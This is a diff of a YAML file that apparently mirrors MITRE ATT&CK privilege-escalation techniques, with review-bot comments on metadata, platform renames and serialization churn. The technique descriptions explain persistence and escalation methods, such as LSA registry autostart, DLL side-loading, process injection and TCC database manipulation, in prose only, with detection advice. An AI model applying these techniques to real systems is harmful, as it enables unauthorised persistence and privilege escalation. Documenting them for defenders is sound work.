- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -21831,7 +22133,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21854,12 +22156,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -21937,12 +22238,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -22003,7 +22303,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -22047,7 +22346,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -22069,7 +22368,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -22150,7 +22448,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -22173,7 +22470,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -22203,12 +22500,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22293,7 +22588,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -22358,7 +22652,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -22433,7 +22726,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22461,7 +22754,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -22492,7 +22784,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22535,12 +22827,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22557,7 +22847,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
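Review bot: the contributor rename `- Alexander Rodchenko` to `- Rodchenko Aleksandr` switches to surname-first order and a different transliteration, which is inconsistent with the neighbouring entry `- Brandon Dalton @PartyD0lphin` and with the given-name-first style used by every other `x_mitre_contributors` list in this file. If the string is copied verbatim from the upstream object this is fine, but if it is hand-edited it should follow the same ordering as the rest of the list.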
@@ -22616,7 +22906,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -22698,12 +22987,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22800,7 +23088,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -22914,7 +23201,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -22984,7 +23270,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.005:
technique:
@@ -23012,7 +23297,7 @@ privilege-escalation:
A Technical Survey Of Common And Trending Process Injection Techniques.
Retrieved December 7, 2017.'
source_name: Elastic Process Injection July 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:24:54.198Z'
name: Thread Local Storage
description: "Adversaries may inject malicious code into processes via thread
local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23056,8 +23341,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1547.007:
technique:
@@ -23093,7 +23376,7 @@ privilege-escalation:
Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist
within the ~/Library/Preferences/ByHost
directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist
file to execute payloads when a user logs in.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T23:46:56.443Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: Re-opened Applications'
x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23112,12 +23395,11 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.007
atomic_tests: []
T1574.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.241Z'
name: 'Hijack Execution Flow: DLL Side-Loading'
description: |-
Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23167,12 +23449,11 @@ privilege-escalation:
url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.002
atomic_tests: []
T1098.002:
technique:
- modified: '2024-01-03T15:46:06.706Z'
+ modified: '2024-10-15T15:37:25.303Z'
name: 'Account Manipulation: Additional Email Delegate Permissions'
description: "Adversaries may grant additional permission levels to maintain
persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23205,9 +23486,10 @@ privilege-escalation:
x_mitre_contributors:
- Microsoft Detection and Response Team (DART)
- Mike Burns, Mandiant
- - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
- Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
- Arad Inbar, Fidelis Security
+ - Nilesh Dherange (Gurucul)
+ - Naveen Vijayaraghavan
x_mitre_deprecated: false
x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
permissions changes that may indicate excessively broad permissions being
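Review bot: splitting `- Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)` into `- Nilesh Dherange (Gurucul)` and `- Naveen Vijayaraghavan` silently drops the Gurucul affiliation from the first contributor; if both were Gurucul in the original entry the affiliation belongs on both new lines. The two new entries are also appended at the end of the list rather than kept at the position of the line they replace, which changes the contributor order for no stated reason.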
@@ -23224,9 +23506,8 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- - Office 365
- - Google Workspace
- x_mitre_version: '2.1'
+ - Office Suite
+ x_mitre_version: '2.2'
x_mitre_data_sources:
- 'Group: Group Modification'
- 'Application Log: Application Log Content'
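Review bot: `x_mitre_platforms` for T1098.002 collapses `- Office 365` and `- Google Workspace` into a single `- Office Suite` entry alongside the `x_mitre_version` bump from `'2.1'` to `'2.2'`. Anything in this repository that keys on the old platform names (per-platform index files, platform filters in the atomic test runner) will stop matching this technique, so the regenerated indexes for the old and new platform names need to land in the same PR; otherwise the technique disappears from those views without any failing check.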
@@ -23272,38 +23553,19 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.002
atomic_tests: []
T1548.006:
technique:
- modified: '2024-04-17T00:02:12.021Z'
+ modified: '2024-10-16T16:54:56.714Z'
name: TCC Manipulation
- description: "Adversaries can manipulate or abuse the Transparency, Consent,
- & Control (TCC) service or database to execute malicious applications with
- elevated permissions. TCC is a Privacy & Security macOS control mechanism
- used to determine if the running process has permission to access the data
- or services protected by TCC, such as screen sharing, camera, microphone,
- or Full Disk Access (FDA).\n\nWhen an application requests to access data
- or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
- located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
- for existing permissions. If permissions do not exist, then the user is prompted
- to grant permission. Once permissions are granted, the database stores the
- application's permissions and will not prompt the user again unless reset.
- For example, when a web browser requests permissions to the user's webcam,
- once granted the web browser may not explicitly prompt the user again.(Citation:
- welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
- abuse the TCC service to execute malicious content. This can be done in various
- ways, including using privileged system applications to execute malicious
- payloads or manipulating the database to grant their application TCC permissions.
- \n\nFor example, adversaries can use Finder, which has FDA permissions by
- default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
- while preventing a user prompt. For a system without System Integrity Protection
- (SIP) enabled, adversaries have also manipulated the operating system to load
- an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
- TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
- inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
- into targeted applications with the desired TCC permissions.\n"
+ description: |+
+ Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+ When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+ Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: defense-evasion
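Review bot: two points on the rewritten T1548.006 description. First, the new block scalar uses `|+`, which keeps every trailing newline, so with the blank line that follows the last paragraph the value now ends in two newlines where the old double-quoted string ended in one (`...TCC permissions.\n"`); harmless for readers, but if the goal is byte-for-byte parity with the upstream object, check that upstream also serializes with `|+`. Second, "checks the TCC database ... and an overwrites file (if connected to an MDM)" reads like a typo for "an overrides file"; if the text is mirrored verbatim from upstream the fix belongs there rather than in this file, but it is worth flagging so it is not perpetuated into detection documentation that quotes this description.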
@@ -23311,6 +23573,8 @@ privilege-escalation:
phase_name: privilege-escalation
x_mitre_contributors:
- Marina Liang
+ - Wojciech Reguła @_r3ggi
+ - Csaba Fitzl @theevilbit of Kandji
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -23318,7 +23582,7 @@ privilege-escalation:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- macOS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'File: File Modification'
@@ -23348,7 +23612,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1055.008:
technique:
@@ -23394,7 +23657,7 @@ privilege-escalation:
description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
Retrieved December 20, 2017.
source_name: Chokepoint preload rootkits
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T12:26:31.766Z'
name: Ptrace System Calls
description: "Adversaries may inject malicious code into processes via ptrace
(process trace) system calls in order to evade process-based defenses as well
@@ -23439,8 +23702,6 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Anti-virus
- Application control
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1037.001:
technique:
@@ -23466,7 +23727,7 @@ privilege-escalation:
url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
18. Retrieved November 15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:03.153Z'
name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
description: "Adversaries may use Windows logon scripts automatically executed
at logon initialization to establish persistence. Windows allows logon scripts
@@ -23492,59 +23753,28 @@ privilege-escalation:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Windows Registry: Windows Registry Key Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1037.001
atomic_tests: []
T1055.015:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - ESET
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
- type: attack-pattern
- created: '2021-11-22T15:02:15.190Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1055.015
- url: https://attack.mitre.org/techniques/T1055/015
- - source_name: Microsoft List View Controls
- url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
- description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
- January 4, 2022.
- - source_name: Modexp Windows Process Injection
- url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
- description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
- Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
- Retrieved November 15, 2021.'
- - source_name: ESET InvisiMole June 2020
- url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
- description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
- HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-14T17:34:33.948Z'
name: 'Process Injection: ListPlanting'
description: "Adversaries may abuse list-view controls to inject malicious code
into hijacked processes in order to evade process-based defenses as well as
possibly elevate privileges. ListPlanting is a method of executing arbitrary
- code in the address space of a separate live process. Code executed via ListPlanting
- may also evade detection from security products since the execution is masked
- under a legitimate process.\n\nList-view controls are user interface windows
- used to display collections of items.(Citation: Microsoft List View Controls)
- Information about an application's list-view settings are stored within the
- process' memory in a SysListView32
control.\n\nListPlanting (a
- form of message-passing \"shatter attack\") may be performed by copying code
- into the virtual address space of a process that uses a list-view control
- then using that code as a custom callback for sorting the listed items.(Citation:
- Modexp Windows Process Injection) Adversaries must first copy code into the
- target process’ memory space, which can be performed various ways including
- by directly obtaining a handle to the SysListView32
child of
- the victim process window (via Windows API calls such as FindWindow
+ code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+ Code executed via ListPlanting may also evade detection from security products
+ since the execution is masked under a legitimate process.\n\nList-view controls
+ are user interface windows used to display collections of items.(Citation:
+ Microsoft List View Controls) Information about an application's list-view
+ settings are stored within the process' memory in a SysListView32
+ control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+ be performed by copying code into the virtual address space of a process that
+ uses a list-view control then using that code as a custom callback for sorting
+ the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+ must first copy code into the target process’ memory space, which can be performed
+ various ways including by directly obtaining a handle to the SysListView32
+ child of the victim process window (via Windows API calls such as FindWindow
and/or EnumWindows
) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
methods.\n\nSome variations of ListPlanting may allocate memory in the target
process but then use window messages to copy the payload, to avoid the use
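Review bot: most of this 59-to-28 line hunk is serializer key-order churn rather than a content change: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list are deleted from the top of T1055.015 and re-added lower down in the following hunks. The substantive edits, the new `(Citation: Hexacorn Listplanting)` in the description and the `modified` change to `'2024-08-14T17:34:33.948Z'`, are hard to see in the noise; consider having the generator emit keys in a stable order so that refreshes produce reviewable diffs, or at least note in the PR that this object was fully re-serialized.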
@@ -23561,6 +23791,9 @@ privilege-escalation:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_contributors:
+ - ESET
+ x_mitre_deprecated: false
x_mitre_detection: "Monitoring Windows API calls indicative of the various types
of code injection may generate a significant amount of data and may not be
directly useful for defense unless collected under specific circumstances
@@ -23575,21 +23808,52 @@ privilege-escalation:
arguments.\n\nAnalyze process behavior to determine if a process is performing
unusual actions, such as opening network connections, reading files, or other
suspicious actions that could relate to post-compromise behavior. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Process: Process Modification'
- 'Process: OS API Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+ created: '2021-11-22T15:02:15.190Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1055/015
+ external_id: T1055.015
+ - source_name: Hexacorn Listplanting
+ description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+ trick. Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+ - source_name: ESET InvisiMole June 2020
+ description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+ HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+ url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+ - source_name: Microsoft List View Controls
+ description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+ January 4, 2022.
+ url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+ - source_name: Modexp Windows Process Injection
+ description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+ Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+ Retrieved November 15, 2021.'
+ url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1055.015
atomic_tests: []
T1484:
technique:
- modified: '2024-04-19T04:27:31.884Z'
+ modified: '2024-10-15T15:55:32.946Z'
name: Domain or Tenant Policy Modification
description: "Adversaries may modify the configuration settings of a domain
or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23634,9 +23898,8 @@ privilege-escalation:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - SaaS
- x_mitre_version: '3.0'
+ - Identity Provider
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Active Directory: Active Directory Object Deletion'
- 'Active Directory: Active Directory Object Creation'
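Review bot: in the T1484 platform list, `- Azure AD` becoming `- Identity Provider` is a rename, but `- SaaS` is removed outright with no replacement, so this is a narrowing of scope and not just a relabel. Please confirm against the upstream `x_mitre_version: '3.1'` object that SaaS was really dropped there, since removing it here takes Domain or Tenant Policy Modification out of any SaaS-scoped index or filter in this repository.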
@@ -23693,8 +23956,8 @@ privilege-escalation:
url: https://wald0.com/?p=179
- source_name: Harmj0y Abusing GPO Permissions
description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
- March 5, 2019.
- url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+ September 23, 2024.
+ url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- source_name: Sygnia Golden SAML
description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
Attack. Retrieved January 6, 2021.
@@ -23703,7 +23966,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.008:
technique:
@@ -23745,7 +24007,7 @@ privilege-escalation:
Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:34:43.405Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Autostart Execution: LSASS Driver'
x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23770,12 +24032,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.008
atomic_tests: []
T1078.004:
technique:
- modified: '2024-03-29T15:42:13.499Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Valid Accounts: Cloud Accounts'
description: "Valid accounts in cloud environments may allow adversaries to
perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23815,8 +24076,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Jon Sternstein, Stern Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
or malicious behavior, such as accessing information outside of the normal
@@ -23824,13 +24087,13 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- - Office 365
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.7'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.8'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Logon Session: Logon Session Metadata'
